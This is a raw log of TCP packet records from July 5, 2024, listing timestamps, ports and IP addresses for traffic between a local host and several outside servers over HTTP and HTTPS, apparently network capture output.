Jul 5, 2024 07:16:30.341175079 CEST	49166	80	192.168.2.22	172.67.148.197
Jul 5, 2024 07:16:30.346024036 CEST	80	49166	172.67.148.197	192.168.2.22
Jul 5, 2024 07:16:30.450175047 CEST	80	49166	172.67.148.197	192.168.2.22
Jul 5, 2024 07:16:30.450254917 CEST	49166	80	192.168.2.22	172.67.148.197
Jul 5, 2024 07:16:30.667514086 CEST	49167	80	192.168.2.22	172.67.148.197
Jul 5, 2024 07:16:30.672323942 CEST	80	49167	172.67.148.197	192.168.2.22
Jul 5, 2024 07:16:30.672379017 CEST	49167	80	192.168.2.22	172.67.148.197
Jul 5, 2024 07:16:30.672946930 CEST	49167	80	192.168.2.22	172.67.148.197
Jul 5, 2024 07:16:30.677814007 CEST	80	49167	172.67.148.197	192.168.2.22
Jul 5, 2024 07:16:31.166044950 CEST	80	49167	172.67.148.197	192.168.2.22
Jul 5, 2024 07:16:31.171535015 CEST	49168	443	192.168.2.22	172.67.148.197
Jul 5, 2024 07:16:31.171564102 CEST	443	49168	172.67.148.197	192.168.2.22
Jul 5, 2024 07:16:31.171622992 CEST	49168	443	192.168.2.22	172.67.148.197
Jul 5, 2024 07:16:31.172775984 CEST	49168	443	192.168.2.22	172.67.148.197
Jul 5, 2024 07:16:31.172785997 CEST	443	49168	172.67.148.197	192.168.2.22
Jul 5, 2024 07:16:31.374727964 CEST	49167	80	192.168.2.22	172.67.148.197
Jul 5, 2024 07:16:31.375072002 CEST	80	49167	172.67.148.197	192.168.2.22
Jul 5, 2024 07:16:31.375127077 CEST	49167	80	192.168.2.22	172.67.148.197
Jul 5, 2024 07:16:31.662404060 CEST	443	49168	172.67.148.197	192.168.2.22
Jul 5, 2024 07:16:31.662473917 CEST	49168	443	192.168.2.22	172.67.148.197
Jul 5, 2024 07:16:31.667363882 CEST	49168	443	192.168.2.22	172.67.148.197
Jul 5, 2024 07:16:31.667381048 CEST	443	49168	172.67.148.197	192.168.2.22
Jul 5, 2024 07:16:31.667668104 CEST	443	49168	172.67.148.197	192.168.2.22
Jul 5, 2024 07:16:31.738805056 CEST	49168	443	192.168.2.22	172.67.148.197
Jul 5, 2024 07:16:31.780505896 CEST	443	49168	172.67.148.197	192.168.2.22
Jul 5, 2024 07:16:32.586663008 CEST	443	49168	172.67.148.197	192.168.2.22
Jul 5, 2024 07:16:32.586767912 CEST	443	49168	172.67.148.197	192.168.2.22
Jul 5, 2024 07:16:32.586977005 CEST	49168	443	192.168.2.22	172.67.148.197
Jul 5, 2024 07:16:32.591761112 CEST	49168	443	192.168.2.22	172.67.148.197
Jul 5, 2024 07:16:32.591780901 CEST	443	49168	172.67.148.197	192.168.2.22
Jul 5, 2024 07:16:32.591798067 CEST	49168	443	192.168.2.22	172.67.148.197
Jul 5, 2024 07:16:32.591804981 CEST	443	49168	172.67.148.197	192.168.2.22
Jul 5, 2024 07:16:33.265311956 CEST	80	49165	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:33.265374899 CEST	49165	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:36.036307096 CEST	49169	80	192.168.2.22	172.67.148.197
Jul 5, 2024 07:16:36.041165113 CEST	80	49169	172.67.148.197	192.168.2.22
Jul 5, 2024 07:16:36.041218996 CEST	49169	80	192.168.2.22	172.67.148.197
Jul 5, 2024 07:16:36.041512012 CEST	49169	80	192.168.2.22	172.67.148.197
Jul 5, 2024 07:16:36.046246052 CEST	80	49169	172.67.148.197	192.168.2.22
Jul 5, 2024 07:16:36.519057035 CEST	80	49169	172.67.148.197	192.168.2.22
Jul 5, 2024 07:16:36.519835949 CEST	49170	443	192.168.2.22	172.67.148.197
Jul 5, 2024 07:16:36.519901037 CEST	443	49170	172.67.148.197	192.168.2.22
Jul 5, 2024 07:16:36.519959927 CEST	49170	443	192.168.2.22	172.67.148.197
Jul 5, 2024 07:16:36.524424076 CEST	49170	443	192.168.2.22	172.67.148.197
Jul 5, 2024 07:16:36.524441957 CEST	443	49170	172.67.148.197	192.168.2.22
Jul 5, 2024 07:16:36.725467920 CEST	49169	80	192.168.2.22	172.67.148.197
Jul 5, 2024 07:16:37.034605980 CEST	443	49170	172.67.148.197	192.168.2.22
Jul 5, 2024 07:16:37.034756899 CEST	49170	443	192.168.2.22	172.67.148.197
Jul 5, 2024 07:16:37.039510012 CEST	49170	443	192.168.2.22	172.67.148.197
Jul 5, 2024 07:16:37.039525032 CEST	443	49170	172.67.148.197	192.168.2.22
Jul 5, 2024 07:16:37.039796114 CEST	443	49170	172.67.148.197	192.168.2.22
Jul 5, 2024 07:16:37.055233002 CEST	49170	443	192.168.2.22	172.67.148.197
Jul 5, 2024 07:16:37.100500107 CEST	443	49170	172.67.148.197	192.168.2.22
Jul 5, 2024 07:16:37.893960953 CEST	443	49170	172.67.148.197	192.168.2.22
Jul 5, 2024 07:16:37.894256115 CEST	443	49170	172.67.148.197	192.168.2.22
Jul 5, 2024 07:16:37.894340992 CEST	49170	443	192.168.2.22	172.67.148.197
Jul 5, 2024 07:16:37.895109892 CEST	49170	443	192.168.2.22	172.67.148.197
Jul 5, 2024 07:16:37.895133018 CEST	443	49170	172.67.148.197	192.168.2.22
Jul 5, 2024 07:16:37.994018078 CEST	49166	80	192.168.2.22	172.67.148.197
Jul 5, 2024 07:16:37.999413013 CEST	80	49166	172.67.148.197	192.168.2.22
Jul 5, 2024 07:16:38.108664036 CEST	80	49166	172.67.148.197	192.168.2.22
Jul 5, 2024 07:16:38.108757973 CEST	49166	80	192.168.2.22	172.67.148.197
Jul 5, 2024 07:16:38.110390902 CEST	49171	443	192.168.2.22	172.67.148.197
Jul 5, 2024 07:16:38.110423088 CEST	443	49171	172.67.148.197	192.168.2.22
Jul 5, 2024 07:16:38.110488892 CEST	49171	443	192.168.2.22	172.67.148.197
Jul 5, 2024 07:16:38.111979961 CEST	49171	443	192.168.2.22	172.67.148.197
Jul 5, 2024 07:16:38.111991882 CEST	443	49171	172.67.148.197	192.168.2.22
Jul 5, 2024 07:16:38.594027042 CEST	443	49171	172.67.148.197	192.168.2.22
Jul 5, 2024 07:16:38.594176054 CEST	49171	443	192.168.2.22	172.67.148.197
Jul 5, 2024 07:16:38.600374937 CEST	49171	443	192.168.2.22	172.67.148.197
Jul 5, 2024 07:16:38.600384951 CEST	443	49171	172.67.148.197	192.168.2.22
Jul 5, 2024 07:16:38.600665092 CEST	443	49171	172.67.148.197	192.168.2.22
Jul 5, 2024 07:16:38.600712061 CEST	49171	443	192.168.2.22	172.67.148.197
Jul 5, 2024 07:16:38.604904890 CEST	49171	443	192.168.2.22	172.67.148.197
Jul 5, 2024 07:16:38.652506113 CEST	443	49171	172.67.148.197	192.168.2.22
Jul 5, 2024 07:16:39.459477901 CEST	443	49171	172.67.148.197	192.168.2.22
Jul 5, 2024 07:16:39.459619045 CEST	49171	443	192.168.2.22	172.67.148.197
Jul 5, 2024 07:16:39.459690094 CEST	443	49171	172.67.148.197	192.168.2.22
Jul 5, 2024 07:16:39.459745884 CEST	49171	443	192.168.2.22	172.67.148.197
Jul 5, 2024 07:16:39.459755898 CEST	443	49171	172.67.148.197	192.168.2.22
Jul 5, 2024 07:16:39.459789991 CEST	49171	443	192.168.2.22	172.67.148.197
Jul 5, 2024 07:16:39.459841967 CEST	443	49171	172.67.148.197	192.168.2.22
Jul 5, 2024 07:16:39.459887981 CEST	49171	443	192.168.2.22	172.67.148.197
Jul 5, 2024 07:16:39.459894896 CEST	443	49171	172.67.148.197	192.168.2.22
Jul 5, 2024 07:16:39.459906101 CEST	49171	443	192.168.2.22	172.67.148.197
Jul 5, 2024 07:16:39.472121000 CEST	49172	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:39.478096962 CEST	80	49172	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:39.478184938 CEST	49172	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:39.478394032 CEST	49172	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:39.484323978 CEST	80	49172	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:40.130676985 CEST	80	49172	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:40.130836964 CEST	49172	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:40.397053957 CEST	49173	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:40.402075052 CEST	80	49173	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:40.402168989 CEST	49173	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:40.402416945 CEST	49173	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:40.407344103 CEST	80	49173	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:41.047250032 CEST	80	49173	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:41.047272921 CEST	80	49173	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:41.047288895 CEST	80	49173	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:41.047305107 CEST	80	49173	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:41.047333002 CEST	49173	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:41.047384024 CEST	49173	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:41.595940113 CEST	49174	80	192.168.2.22	91.92.254.14
Jul 5, 2024 07:16:41.600984097 CEST	80	49174	91.92.254.14	192.168.2.22
Jul 5, 2024 07:16:41.601042986 CEST	49174	80	192.168.2.22	91.92.254.14
Jul 5, 2024 07:16:41.602045059 CEST	49174	80	192.168.2.22	91.92.254.14
Jul 5, 2024 07:16:41.607012033 CEST	80	49174	91.92.254.14	192.168.2.22
Jul 5, 2024 07:16:41.948292017 CEST	49173	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:42.221237898 CEST	80	49174	91.92.254.14	192.168.2.22
Jul 5, 2024 07:16:42.221273899 CEST	80	49174	91.92.254.14	192.168.2.22
Jul 5, 2024 07:16:42.221282959 CEST	80	49174	91.92.254.14	192.168.2.22
Jul 5, 2024 07:16:42.221354008 CEST	80	49174	91.92.254.14	192.168.2.22
Jul 5, 2024 07:16:42.221532106 CEST	49174	80	192.168.2.22	91.92.254.14
Jul 5, 2024 07:16:44.918817043 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:44.923809052 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:44.923865080 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:44.924412966 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:44.931155920 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.141943932 CEST	80	49172	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:45.142000914 CEST	49172	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:45.572416067 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.572433949 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.572452068 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.572504044 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:45.572518110 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.572536945 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.572560072 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:45.572587013 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.572632074 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:45.651916027 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.651942968 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.651959896 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.651993990 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:45.652056932 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.652074099 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.652091980 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:45.652299881 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.652344942 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.652396917 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:45.668006897 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.668035030 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.668073893 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.668127060 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.668188095 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:45.731717110 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.731745005 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.731772900 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.731792927 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.731801033 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:45.731843948 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:45.731882095 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.731942892 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.731961012 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.731985092 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.731987953 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:45.732038021 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:45.748313904 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.748478889 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.748503923 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.748620987 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:45.748640060 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.748658895 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.748800039 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:45.748991013 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.749016047 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.749036074 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.749053001 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.749063969 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:45.749072075 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.749098063 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:45.749545097 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.749593019 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:45.749613047 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.812602997 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.812654972 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.812670946 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.812757015 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:45.812781096 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.812798977 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.812858105 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:45.812980890 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.813036919 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.813052893 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.813103914 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.813103914 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:45.827251911 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.827290058 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.827306032 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.827336073 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.827352047 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:45.827390909 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:45.827534914 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.827606916 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.827624083 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.827656031 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:45.827687025 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.827709913 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.827729940 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:45.828368902 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.828430891 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.828448057 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.828476906 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:45.828531027 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.828547001 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.828577995 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:45.843966961 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.844043016 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.844074011 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:45.891127110 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.891156912 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.891165972 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.891237020 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.891252041 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.891302109 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:45.891351938 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:45.891547918 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.891563892 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.891586065 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.891603947 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.891618967 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.891628981 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:45.891680956 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:45.892425060 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.892441988 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.892457962 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.892491102 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.892498970 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:45.892510891 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.893210888 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.893260956 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:45.893273115 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.893289089 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.893384933 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.893400908 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.893426895 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:45.894047022 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.894088030 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:45.894242048 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.908205032 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.908231974 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.908241987 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.908250093 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.908258915 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.908418894 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:45.908502102 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.908561945 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.908577919 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.908617973 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:45.908709049 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.908724070 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.909261942 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.909305096 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:45.909338951 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.970314026 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.970357895 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.970376968 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.970431089 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.970447063 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.970451117 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:45.970503092 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:45.970861912 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.970931053 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.970947027 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.970987082 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:45.971026897 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.971045971 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.971107960 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:45.971592903 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.971610069 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.971625090 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.971662998 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:45.971685886 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.971702099 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.972336054 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.972352982 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.972378016 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:45.972404003 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.972419977 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.972434998 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.972446918 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:45.972471952 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:45.974385977 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.984468937 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:45.986515999 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.986558914 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.986567974 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.986674070 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.986690998 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.986761093 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:45.986804008 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:45.986912966 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.986994028 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.987010002 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.987055063 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:45.987087965 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.987104893 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.987766027 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.987795115 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.987808943 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:45.987812042 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.987976074 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.987993002 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.988019943 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:45.988656044 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.988707066 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.988723040 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.988750935 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:45.988836050 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.988852024 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.988878012 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:45.989474058 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.989516020 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:45.989569902 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:45.997534990 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.050168037 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.050209045 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.050226927 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.050291061 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.050309896 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.050331116 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.050514936 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.050559044 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.050560951 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.050575972 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.050688028 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.050703049 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.050729036 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.051472902 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.051490068 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.051507950 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.051532984 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.051565886 CEST	80	49175	91.92.254.194	192.168.2.22
